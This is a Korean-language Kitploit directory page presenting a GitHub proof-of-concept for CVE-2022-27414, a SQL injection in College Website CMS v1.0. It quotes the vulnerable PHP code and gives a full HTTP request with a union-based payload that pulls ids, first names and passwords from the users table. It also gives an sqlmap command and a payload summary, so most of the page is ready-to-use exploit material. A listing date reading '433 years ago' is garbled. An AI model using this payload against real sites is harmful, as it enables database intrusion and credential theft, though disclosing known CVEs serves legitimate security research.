Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-27414 — College Website v1.0 CMS - SQL 인젝션 익스플로잇 | Kitploit
도구/GitHubGitHub/lus33rr/cve-2022-27414
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHublus33rr/cve-2022-27414

CVE-2022-27414

College Website v1.0 CMS - SQL 인젝션 익스플로잇

저장소 보기
433년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-27414 - SQL-Injection

College Website CMS v1.0 - CVE-2022-27414 - SQL Injection

CVE url


root@kitploit:~
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27414

아래 PoC

취약한 코드


"cwms\departments\index.php" 파일의 9번째 줄부터 시작

root@kitploit:~
<?php
$departments = $conn->query("SELECT * FROM `department_list` where delete_flag = 0 and `status` = 1 order by `name` asc");
while ($row = $departments->fetch_assoc()):
?>
                    <div class="list-group-item">
                        <h3><b><?=$row['name'] ?></b></h3>
                        <hr>
                        <p><?=$row['description'] ?></p>
                        <div class="text-right">
                            <a href="./?p=courses&department_id=<?=$row['id'] ?>">List Courses</a>
                        </div>

요청 (PoC)


root@kitploit:~
GET /cwms/?p=courses&department_id=1%27%20union%20all%20select%201,(SELECT+GROUP_CONCAT(id,firstname,password+SEPARATOR+0x3c62723e)+FROM+cwms_db.users),3,4,5,6,7--%20- HTTP/1.1
Host: 192.168.8.121
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b4rppi73ltkm5vh89ad4kl7p6m
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

sqlmap 명령 (자동)


root@kitploit:~
sudo sqlmap -u 'http://localhost/cwms/?p=courses&department_id=1' --dbs

매개변수 정보

root@kitploit:~
Type : Union-based
payload : http://localhost/cwms/?p=courses&department_id=1' union all select 1 (SELECT+GROUP_CONCAT(id,firstname,password+SEPARATOR+0x3c62723e)+FROM+cwms_db.users),3,4,5,6,7-- -

발견자

root@kitploit:~
Ayed AlQahtani
도구 다운로드